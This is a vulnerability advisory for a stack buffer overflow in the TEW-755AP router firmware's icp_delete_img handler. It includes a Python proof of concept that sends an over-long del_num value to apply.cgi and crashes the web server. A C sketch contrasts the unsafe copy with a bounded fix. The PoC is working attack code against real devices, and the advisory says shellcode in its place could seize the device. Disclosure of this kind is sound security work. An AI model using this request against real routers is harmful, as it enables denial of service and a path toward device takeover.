We found a stack buffer overflow vulnerability in **TEW-755AP** (firmware version TEW755AP-FW113B01.bin).
In the handler function for the action icp_delete_img (sub_41DEDC) in the file /www/cgi/ssi, the value of del_num is copied directly into a stack buffer without a size check. An attacker can supply a very long string for this field in the POST data sent to apply.cgi to overflow the stack buffer, and can finally perform a Remote Code Execution attack.
PoC
```python
import requests

# Target URL of the vulnerable CGI endpoint (IP from the original test setup)
url = "http://192.168.17.221:80/apply.cgi"
# Session cookie uid=1234; requests expects the cookie name as the dict key
cookie = {"uid": "1234"}
data = {
    "action": "icp_delete_img",
    "del_num": "a" * 0x1000,  # over-long value copied into the stack buffer
}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)
```
We use Python to send a crafted HTTP POST request to the web server and print out the returned message.
When the crafted HTTP request is sent to the server, it returns a 502 error code. This is because the stack buffer is overflowed by the input “aaaaaaaaaaaaaaaaaa…”. If the input were malicious shellcode instead, the system would be controlled by the attacker.
Fix Suggestion:
Use a bounded copy such as snprintf, checking the length of del_num against the size of the destination buffer, to avoid the buffer overflow.
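As an added illustration of the suggested fix (not code from the advisory or from the vendor firmware; the buffer size and function names are assumptions), the unbounded copy pattern beside a bounded version that rejects over-long values instead of silently truncating them:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEL_NUM_BUF 32   /* assumed stack buffer size; the real size is not given */

/* Unsafe pattern described in the advisory: the request value is copied into
 * a fixed-size stack buffer with no length check. Shown for contrast only and
 * never called here. */
static void icp_delete_img_unsafe(const char *del_num)
{
    char buf[DEL_NUM_BUF];
    strcpy(buf, del_num);   /* overflows buf when del_num is longer than it */
    (void)buf;
}

/* Hardened copy: bound the write with snprintf and treat truncation as an
 * error. Returns 0 when the value fits, -1 when it is missing or too long. */
int icp_delete_img_safe(const char *del_num, char *out, size_t out_size)
{
    if (del_num == NULL || out == NULL || out_size == 0)
        return -1;
    /* snprintf reports the length it wanted to write; if that does not fit
     * together with the terminating NUL, the request is rejected */
    int n = snprintf(out, out_size, "%s", del_num);
    if (n < 0 || (size_t)n >= out_size) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Handler wrapper using the same stack buffer size as the unsafe version. */
int handle_icp_delete_img(const char *del_num)
{
    char buf[DEL_NUM_BUF];
    return icp_delete_img_safe(del_num, buf, sizeof buf);
}

/* Returns the handler result for a constructed value of `len` 'a' characters,
 * mirroring the "a" * 0x1000 payload from the PoC. */
int result_for_repeated_a(size_t len)
{
    char *value = malloc(len + 1);
    if (value == NULL)
        return -1;
    memset(value, 'a', len);
    value[len] = '\0';
    int rc = handle_icp_delete_img(value);
    free(value);
    return rc;
}
```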